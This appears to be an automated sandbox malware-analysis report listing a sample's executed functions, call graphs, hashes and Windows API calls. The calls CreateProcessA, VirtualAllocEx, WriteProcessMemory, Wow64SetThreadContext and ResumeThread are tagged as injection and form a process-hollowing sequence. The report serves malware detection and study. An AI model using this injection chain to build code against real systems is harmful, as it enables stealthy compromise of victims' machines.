API calls 35467->35468 35469 fad36f 35467->35469 35468->35469 35469->35432 35471 facf19 35470->35471 35473 fadc80 35471->35473 35474 fad03c 35471->35474 35473->35473 35475 fad047 35474->35475 35476 fa5d04 2 API calls 35475->35476 35477 fadcef 35476->35477 35477->35473 35485 fad688 DuplicateHandle 35486 fad71e 35485->35486 35203 73969be 35204 739694c 35203->35204 35205 73969c1 35203->35205 35206 7396930 35204->35206 35224 73971f8 35204->35224 35229 73972e4 35204->35229 35234 73972a2 35204->35234 35244 7396e43 35204->35244 35249 7396e4e 35204->35249 35254 739736f 35204->35254 35258 7396d4c 35204->35258 35263 7397028 35204->35263 35268 7396ea8 35204->35268 35273 7396d69 35204->35273 35278 7397056 35204->35278 35282 7397315 35204->35282 35287 7397415 35204->35287 35292 7397132 35204->35292 35297 7397252 35204->35297 35302 73970d3 35204->35302 35312 7396f7a 35204->35312 35225 7396d5c 35224->35225 35226 7396e2b 35225->35226 35322 7393e80 35225->35322 35326 7393e74 35225->35326 35226->35206 35230 73972f4 35229->35230 35231 7397348 35230->35231 35330 7393bf8 35230->35330 35334 7393bf0 35230->35334 35235 739728e 35234->35235 35236 739727e 35234->35236 35346 7393a59 35235->35346 35350 7393a60 35235->35350 35236->35235 35237 7396e65 35236->35237 35338 73939a9 35237->35338 35342 73939b0 35237->35342 35238 739756e 35238->35238 35239 7396e7a 35239->35206 35245 739741c 35244->35245 35354 7393ce0 35245->35354 35358 7393ce8 35245->35358 35246 739743e 35250 7396e54 35249->35250 35252 73939a9 ResumeThread 35250->35252 35253 73939b0 ResumeThread 35250->35253 35251 7396e7a 35251->35206 35252->35251 35253->35251 35256 7393bf8 WriteProcessMemory 35254->35256 35257 7393bf0 WriteProcessMemory 35254->35257 35255 7397397 35256->35255 35257->35255 35259 7396d5c 35258->35259 35260 7396e2b 35259->35260 35261 7393e80 CreateProcessA 35259->35261 35262 7393e74 CreateProcessA 35259->35262 35260->35206 35261->35259 35262->35259 35264 739702e 35263->35264 35266 7393bf8 WriteProcessMemory 35264->35266 35267 7393bf0 WriteProcessMemory 35264->35267 35265 7397540 35266->35265 35267->35265 35269 7396e65 35268->35269 35271 73939a9 ResumeThread 35269->35271 35272 73939b0 ResumeThread 35269->35272 35270 7396e7a 35270->35206 35271->35270 35272->35270 35274 7396d5c 35273->35274 35275 7396e2b 35274->35275 35276 7393e80 CreateProcessA 35274->35276 35277 7393e74 CreateProcessA 35274->35277 35275->35206 35276->35274 35277->35274 35280 7393a59 Wow64SetThreadContext 35278->35280 35281 7393a60 Wow64SetThreadContext 35278->35281 35279 7397070 35279->35206 35280->35279 35281->35279 35283 739731a 35282->35283 35285 7393bf8 WriteProcessMemory 35283->35285 35286 7393bf0 WriteProcessMemory 35283->35286 35284 7397348 35285->35284 35286->35284 35288 739741b 35287->35288 35289 739743e 35288->35289 35290 7393ce8 ReadProcessMemory 35288->35290 35291 7393ce0 ReadProcessMemory 35288->35291 35290->35289 35291->35289 35293 73972b2 35292->35293 35362 73979c8 35293->35362 35367 73979b8 35293->35367 35294 73972ce 35294->35206 35299 7396d5c 35297->35299 35298 7396e2b 35298->35206 35299->35298 35300 7393e80 CreateProcessA 35299->35300 35301 7393e74 CreateProcessA 35299->35301 35300->35299 35301->35299 35304 7396f7a 35302->35304 35303 739728e 35308 7393a59 Wow64SetThreadContext 35303->35308 35309 7393a60 Wow64SetThreadContext 35303->35309 35304->35303 35306 7396e65 35304->35306 35305 739756e 35310 73939a9 ResumeThread 35306->35310 35311 73939b0 ResumeThread 35306->35311 35307 7396e7a 35307->35206 35308->35305 35309->35305 35310->35307 35311->35307 35313 7396f8f 35312->35313 35314 739728e 35313->35314 35316 7396e65 35313->35316 35318 7393a59 Wow64SetThreadContext 35314->35318 35319 7393a60 Wow64SetThreadContext 35314->35319 35315 739756e 35320 73939a9 ResumeThread 35316->35320 35321 73939b0 ResumeThread 35316->35321 35317 7396e7a 35317->35206 35318->35315 35319->35315 35320->35317 35321->35317 35323 7393f09 CreateProcessA 35322->35323 35325 73940cb 35323->35325 35327 7393e80 CreateProcessA 35326->35327 35329 73940cb 35327->35329 35331 7393c40 WriteProcessMemory 35330->35331 35333 7393c97 35331->35333 35333->35231 35335 7393bf8 WriteProcessMemory 35334->35335 35337 7393c97 35335->35337 35337->35231 35339 73939b0 ResumeThread 35338->35339 35341 7393a21 35339->35341 35341->35239 35343 73939f0 ResumeThread 35342->35343 35345 7393a21 35343->35345 35345->35239 35347 7393aa5 Wow64SetThreadContext 35346->35347 35349 7393aed 35347->35349 35349->35238 35351 7393aa5 Wow64SetThreadContext 35350->35351 35353 7393aed 35351->35353 35353->35238 35355 7393ce8 ReadProcessMemory 35354->35355 35357 7393d77 35355->35357 35357->35246 35359 7393d33 ReadProcessMemory 35358->35359 35361 7393d77 35359->35361 35361->35246 35363 73979dd 35362->35363 35372 7393b38 35363->35372 35376 7393b30 35363->35376 35364 73979fc 35364->35294 35368 73979c2 35367->35368 35370 7393b38 VirtualAllocEx 35368->35370 35371 7393b30 VirtualAllocEx 35368->35371 35369 73979fc 35369->35294 35370->35369 35371->35369 35373 7393b78 VirtualAllocEx 35372->35373 35375 7393bb5 35373->35375 35375->35364 35377 7393b38 VirtualAllocEx 35376->35377 35379 7393bb5 35377->35379 35379->35364 35478 7398020 35479 73981ab 35478->35479 35480 7398046 35478->35480 35480->35479 35482 7397b2c 35480->35482 35483 73982a0 PostMessageW 35482->35483 35484 739830c 35483->35484 35484->35480 35487 fad440 35488 fad486 GetCurrentProcess 35487->35488 35490 fad4d8 GetCurrentThread 35488->35490 35491 fad4d1 35488->35491 35492 fad515 GetCurrentProcess 35490->35492 35493 fad50e 35490->35493 35491->35490 35494 fad54b 35492->35494 35493->35492 35495 fad573 GetCurrentThreadId 35494->35495 35496 fad5a4 35495->35496

            Executed Functions

            Function 07396D4C Relevance: .1, Instructions: 85COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a6088848959339778b2db6458ade9d96f06fba37bd90cad81f46321194edac9c
            • Instruction ID: ec9fb48a8c627779134942b2049155f24a8bc0dbffc79345fad4ddfa752916ac
            • Opcode Fuzzy Hash: a6088848959339778b2db6458ade9d96f06fba37bd90cad81f46321194edac9c
            • Instruction Fuzzy Hash: 763116B5E19228CFEF64DF54C941BE8BBB9AB4A300F1090EAD50DA7681D7709AC5CF40
            Function 00FAD430 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 00FAD4BE
            • GetCurrentThread.KERNEL32 ref: 00FAD4FB
            • GetCurrentProcess.KERNEL32 ref: 00FAD538
            • GetCurrentThreadId.KERNEL32 ref: 00FAD591
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: e4968a53d0ced267502286c564373d964601533f27bfe642a6cb3835f9401325
            • Instruction ID: 44cd2cc68a4370f52d0679c14016b2fe3df130172b9ddc2705968dfdfb621d8a
            • Opcode Fuzzy Hash: e4968a53d0ced267502286c564373d964601533f27bfe642a6cb3835f9401325
            • Instruction Fuzzy Hash: A75165B0D003498FDB54CFA9D548BEEBBF1BF88318F24845AE419A7390DB785944CB65
            Function 00FAD440 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 00FAD4BE
            • GetCurrentThread.KERNEL32 ref: 00FAD4FB
            • GetCurrentProcess.KERNEL32 ref: 00FAD538
            • GetCurrentThreadId.KERNEL32 ref: 00FAD591
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: cc8024c93cbcce46eeea77e825a0f32bb01f59fa785300259d51fcb13b9a5cdf
            • Instruction ID: 9bd753001aab5fc5cfdbd2cad7104b1754cd2bf7cc4579ba2e8eab2fecb98da2
            • Opcode Fuzzy Hash: cc8024c93cbcce46eeea77e825a0f32bb01f59fa785300259d51fcb13b9a5cdf
            • Instruction Fuzzy Hash: D85153B0D003498FDB54CFAAD648BDEBBF1BF88318F248459E419A7360DB74A944CB65
            Function 05234A60 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
            Download Yara Rule

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: $
            • API String ID: 0-227171996
            • Opcode ID: 6bc367701b95384fc4b2e2506d25a48b79a827f0c5c072fc12483fb5afcb4690
            • Instruction ID: b6304124bc551c2922a7550aeb9e1ac5b6de582c46524de06118bd81d06464da
            • Opcode Fuzzy Hash: 6bc367701b95384fc4b2e2506d25a48b79a827f0c5c072fc12483fb5afcb4690
            • Instruction Fuzzy Hash: 74719071910701CFEB11EF2CE8C9655B7F1FF95304B4186A8D949AB32AEB71E984CB80
            Function 05232AEC Relevance: 2.7, Strings: 2, Instructions: 162COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 70 5232aec-5234b71 95 5234b74 call 5235708 70->95 96 5234b74 call 5235718 70->96 77 5234b7a-5234b93 81 5234bf5-5234cda call 5232b1c call 5231968 call 5232b2c 77->81 82 5234b95-5234bed 77->82 82->81 95->77 96->77
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: $
            • API String ID: 0-227171996
            • Opcode ID: a80e5f5b21cf1fdb978c76178deeefb00b9614d44887d897ecd340d1a234edc6
            • Instruction ID: 399cc68c6a163cf34a0fc5f5c8e87608fb39e0214c5fd69310d5f6953f6a5917
            • Opcode Fuzzy Hash: a80e5f5b21cf1fdb978c76178deeefb00b9614d44887d897ecd340d1a234edc6
            • Instruction Fuzzy Hash: 36717F31910701CFEB11EF2DE4C9655B7F1FF95304B4186A9D949AB32AEB71E988CB80
            Function 07393E74 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 97 7393e74-7393f15 100 7393f4e-7393f6e 97->100 101 7393f17-7393f21 97->101 108 7393f70-7393f7a 100->108 109 7393fa7-7393fd6 100->109 101->100 102 7393f23-7393f25 101->102 103 7393f48-7393f4b 102->103 104 7393f27-7393f31 102->104 103->100 106 7393f33 104->106 107 7393f35-7393f44 104->107 106->107 107->107 111 7393f46 107->111 108->109 110 7393f7c-7393f7e 108->110 117 7393fd8-7393fe2 109->117 118 739400f-73940c9 CreateProcessA 109->118 112 7393fa1-7393fa4 110->112 113 7393f80-7393f8a 110->113 111->103 112->109 115 7393f8c 113->115 116 7393f8e-7393f9d 113->116 115->116 116->116 119 7393f9f 116->119 117->118 120 7393fe4-7393fe6 117->120 129 73940cb-73940d1 118->129 130 73940d2-7394158 118->130 119->112 122 7394009-739400c 120->122 123 7393fe8-7393ff2 120->123 122->118 124 7393ff4 123->124 125 7393ff6-7394005 123->125 124->125 125->125 127 7394007 125->127 127->122 129->130 140 7394168-739416c 130->140 141 739415a-739415e 130->141 143 739417c-7394180 140->143 144 739416e-7394172 140->144 141->140 142 7394160 141->142 142->140 145 7394190-7394194 143->145 146 7394182-7394186 143->146 144->143 147 7394174 144->147 149 73941a6-73941ad 145->149 150 7394196-739419c 145->150 146->145 148 7394188 146->148 147->143 148->145 151 73941af-73941be 149->151 152 73941c4 149->152 150->149 151->152 154 73941c5 152->154 154->154
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073940B6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 70dd57d741e5f699cc01b97f40384ef4412fd190cb68ac48b32923f2ce93fcc9
            • Instruction ID: 241975bcb43ae0fcdc607f54ac7efb7c95be2235b9c30f47188409fa01a2d21a
            • Opcode Fuzzy Hash: 70dd57d741e5f699cc01b97f40384ef4412fd190cb68ac48b32923f2ce93fcc9
            • Instruction Fuzzy Hash: 11A14AB1D0125ADFEF24CF68C8417DEBBB2AF48314F1481A9E809A7240EB759985CF91
            Function 07393E80 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 155 7393e80-7393f15 157 7393f4e-7393f6e 155->157 158 7393f17-7393f21 155->158 165 7393f70-7393f7a 157->165 166 7393fa7-7393fd6 157->166 158->157 159 7393f23-7393f25 158->159 160 7393f48-7393f4b 159->160 161 7393f27-7393f31 159->161 160->157 163 7393f33 161->163 164 7393f35-7393f44 161->164 163->164 164->164 168 7393f46 164->168 165->166 167 7393f7c-7393f7e 165->167 174 7393fd8-7393fe2 166->174 175 739400f-73940c9 CreateProcessA 166->175 169 7393fa1-7393fa4 167->169 170 7393f80-7393f8a 167->170 168->160 169->166 172 7393f8c 170->172 173 7393f8e-7393f9d 170->173 172->173 173->173 176 7393f9f 173->176 174->175 177 7393fe4-7393fe6 174->177 186 73940cb-73940d1 175->186 187 73940d2-7394158 175->187 176->169 179 7394009-739400c 177->179 180 7393fe8-7393ff2 177->180 179->175 181 7393ff4 180->181 182 7393ff6-7394005 180->182 181->182 182->182 184 7394007 182->184 184->179 186->187 197 7394168-739416c 187->197 198 739415a-739415e 187->198 200 739417c-7394180 197->200 201 739416e-7394172 197->201 198->197 199 7394160 198->199 199->197 202 7394190-7394194 200->202 203 7394182-7394186 200->203 201->200 204 7394174 201->204 206 73941a6-73941ad 202->206 207 7394196-739419c 202->207 203->202 205 7394188 203->205 204->200 205->202 208 73941af-73941be 206->208 209 73941c4 206->209 207->206 208->209 211 73941c5 209->211 211->211
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073940B6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: ba1fe5617efdf809381b2855c537a2cb74d3a204208c34495ad4d28633efc6b2
            • Instruction ID: 2f619ebdc26e08f079f2dc7ae92f3c33f2d70c5a9d8677cf08b5a367d2e56c9c
            • Opcode Fuzzy Hash: ba1fe5617efdf809381b2855c537a2cb74d3a204208c34495ad4d28633efc6b2
            • Instruction Fuzzy Hash: E1913AB1D0125ADFEF24CF69C84179EBBB2AF48314F1481A9E809A7240EB759985CF91
            Function 00FAADA8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 212 faada8-faadb7 213 faadb9-faadc6 call faa120 212->213 214 faade3-faade7 212->214 220 faadc8 213->220 221 faaddc 213->221 216 faadfb-faae3c 214->216 217 faade9-faadf3 214->217 223 faae49-faae57 216->223 224 faae3e-faae46 216->224 217->216 267 faadce call fab040 220->267 268 faadce call fab031 220->268 221->214 225 faae7b-faae7d 223->225 226 faae59-faae5e 223->226 224->223 231 faae80-faae87 225->231 228 faae69 226->228 229 faae60-faae67 call faa12c 226->229 227 faadd4-faadd6 227->221 230 faaf18-faafd8 227->230 233 faae6b-faae79 228->233 229->233 262 faafda-faafdd 230->262 263 faafe0-fab00b GetModuleHandleW 230->263 234 faae89-faae91 231->234 235 faae94-faae9b 231->235 233->231 234->235 238 faaea8-faaeb1 call faa13c 235->238 239 faae9d-faaea5 235->239 243 faaebe-faaec3 238->243 244 faaeb3-faaebb 238->244 239->238 245 faaee1-faaeee 243->245 246 faaec5-faaecc 243->246 244->243 253 faaef0-faaf0e 245->253 254 faaf11-faaf17 245->254 246->245 248 faaece-faaede call faa14c call faa15c 246->248 248->245 253->254 262->263 264 fab00d-fab013 263->264 265 fab014-fab028 263->265 264->265 267->227 268->227
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAFFE
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: b64cabb7fea2a8aee5c76657bac4dc157fd1a03779aab3f9c1127e56a7031009
            • Instruction ID: 21d38c33ff5efff1958bb52e8036f7010057a3202593755213b97c4b97bfee37
            • Opcode Fuzzy Hash: b64cabb7fea2a8aee5c76657bac4dc157fd1a03779aab3f9c1127e56a7031009
            • Instruction Fuzzy Hash: 4F7134B0A00B058FDB24DF2AD44575ABBF1FF89314F008A2DD48AD7A40DB75E949DB91
            Function 00FA590C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 269 fa590c-fa5916 270 fa5918-fa59d9 CreateActCtxA 269->270 272 fa59db-fa59e1 270->272 273 fa59e2-fa5a3c 270->273 272->273 280 fa5a4b-fa5a4f 273->280 281 fa5a3e-fa5a41 273->281 282 fa5a60 280->282 283 fa5a51-fa5a5d 280->283 281->280 285 fa5a61 282->285 283->282 285->285
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 00FA59C9
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 963e9c435735e0b5466edeb89d952b594f5daa88f2585a758103fb8c66d196b7
            • Instruction ID: ad25f3135279a78e39145830a0bd37de5d4b23fff57e499d4e02e107d255ad33
            • Opcode Fuzzy Hash: 963e9c435735e0b5466edeb89d952b594f5daa88f2585a758103fb8c66d196b7
            • Instruction Fuzzy Hash: AB41F2B1C0071DCBEB25CFA9C884BDEBBB5BF49714F20815AD408AB251DB755946CF90
            Function 00FA4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 286 fa4514-fa59d9 CreateActCtxA 289 fa59db-fa59e1 286->289 290 fa59e2-fa5a3c 286->290 289->290 297 fa5a4b-fa5a4f 290->297 298 fa5a3e-fa5a41 290->298 299 fa5a60 297->299 300 fa5a51-fa5a5d 297->300 298->297 302 fa5a61 299->302 300->299 302->302
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 00FA59C9
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: a2ff20ba334ea1b0e886250f7cb371e27d9950561490fc6f512ecd08f4781981
            • Instruction ID: b90eb5b7be9a1ea6a74da20f91c9397b9ae035bce6169a4ea504ae3352ef0394
            • Opcode Fuzzy Hash: a2ff20ba334ea1b0e886250f7cb371e27d9950561490fc6f512ecd08f4781981
            • Instruction Fuzzy Hash: 4341F3B1C0072DCBEB24CFA9C98479EFBB5BF49714F20815AD408AB251DB756949CF90
            Function 07393BF0 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 303 7393bf0-7393c46 306 7393c48-7393c54 303->306 307 7393c56-7393c95 WriteProcessMemory 303->307 306->307 309 7393c9e-7393cce 307->309 310 7393c97-7393c9d 307->310 310->309
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07393C88
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: a1f978cb55dc1ceb818fb1248af5c07d50b1d02a6cf99b33429e2fb058e2a41a
            • Instruction ID: 8a76630c7af84f1225c6bf5d38d0b4b0f3664b1955af66e1f7212a92578f6fc3
            • Opcode Fuzzy Hash: a1f978cb55dc1ceb818fb1248af5c07d50b1d02a6cf99b33429e2fb058e2a41a
            • Instruction Fuzzy Hash: EE2125B19003499FDB10DFAAC981BDEBBF5FF48310F10842AE959A7240D7789950CBA4
            Function 07393BF8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 314 7393bf8-7393c46 316 7393c48-7393c54 314->316 317 7393c56-7393c95 WriteProcessMemory 314->317 316->317 319 7393c9e-7393cce 317->319 320 7393c97-7393c9d 317->320 320->319
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07393C88
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: b9592193e5d6fe04f32c144b323d0ae8149296843064156353660011343e69dd
            • Instruction ID: cc01a65262cc0cb83c7dfa96a5fe2507d8bbe8a4f5995aafb42a3fe90555128f
            • Opcode Fuzzy Hash: b9592193e5d6fe04f32c144b323d0ae8149296843064156353660011343e69dd
            • Instruction Fuzzy Hash: FC2115B59003499FDF10CFAAC985BDEBBF5FF48310F10842AE958A7240D7789950CBA5
            Function 07393CE0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 324 7393ce0-7393d75 ReadProcessMemory 328 7393d7e-7393dae 324->328 329 7393d77-7393d7d 324->329 329->328
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07393D68
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: ca158523474b3999cf18bc2b27df37cfdc23484e525671ed6d2be8f89506eafb
            • Instruction ID: 8389047107d6560de1886dfc3a2fcac4d0f5312a5cc27f1fe11a828721973230
            • Opcode Fuzzy Hash: ca158523474b3999cf18bc2b27df37cfdc23484e525671ed6d2be8f89506eafb
            • Instruction Fuzzy Hash: 752127B18003499FDB10DFAAC840ADEFBF5FF48310F20842AE559A7240C7799501DBA5
            Function 07393A59 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 333 7393a59-7393aab 335 7393abb-7393aeb Wow64SetThreadContext 333->335 336 7393aad-7393ab9 333->336 338 7393aed-7393af3 335->338 339 7393af4-7393b24 335->339 336->335 338->339
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07393ADE
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 6db2799c5a491e94b9068b50a4347c052234df2ecee06bd6320abc38ca96dcd3
            • Instruction ID: cec7761239e637c3e7b62e7811b58e40840cff783052b4fb4ba8f20e9c1ad07c
            • Opcode Fuzzy Hash: 6db2799c5a491e94b9068b50a4347c052234df2ecee06bd6320abc38ca96dcd3
            • Instruction Fuzzy Hash: DB216AB590030A9FEB10DFAAC4817EEBBF4EF48314F148429D519A7240CB789945CFA0
            Function 07393CE8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 353 7393ce8-7393d75 ReadProcessMemory 356 7393d7e-7393dae 353->356 357 7393d77-7393d7d 353->357 357->356
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07393D68
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 1ae32376beafc39ca987844d60946b82e9e8c0e6d4a46f19849a42efce7b501e
            • Instruction ID: 19b4f74aedc3922a0809d8ef9a6f5cfb7b2bcf90f9af574226a0cb5439522366
            • Opcode Fuzzy Hash: 1ae32376beafc39ca987844d60946b82e9e8c0e6d4a46f19849a42efce7b501e
            • Instruction Fuzzy Hash: A921E6B29003599FDF10DFAAC881BDEBBF5FF48310F14842AE519A7240D7799950CBA5
            Function 07393A60 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 343 7393a60-7393aab 345 7393abb-7393aeb Wow64SetThreadContext 343->345 346 7393aad-7393ab9 343->346 348 7393aed-7393af3 345->348 349 7393af4-7393b24 345->349 346->345 348->349
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07393ADE
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 2fc7d87e74bc229ce75984d779ead22228769c36e7f387f5a0e03fcdb5ed970b
            • Instruction ID: ef778f8c557c45e7a25b369a73a15ae67b71adff5ebfce1e99565794966e1d57
            • Opcode Fuzzy Hash: 2fc7d87e74bc229ce75984d779ead22228769c36e7f387f5a0e03fcdb5ed970b
            • Instruction Fuzzy Hash: BD211AB19003099FEB10DFAAC4857AEBBF4EF48314F148429D519A7240DB789944CFA5
            Function 00FAD688 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAD70F
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 2b17a0c474d6a263c05e53ac40f941b277fb22cfe8bea6601d0f7f17dd447bcf
            • Instruction ID: 62b25e75567cd90e5fc621724addcc58c8ac6428c4ee9206ae2301b04092c404
            • Opcode Fuzzy Hash: 2b17a0c474d6a263c05e53ac40f941b277fb22cfe8bea6601d0f7f17dd447bcf
            • Instruction Fuzzy Hash: CC21C4B5900249DFDB10CF9AD984ADEFBF8FB48320F14841AE914A7350D375A954CF65
            Function 00FAD681 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAD70F
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
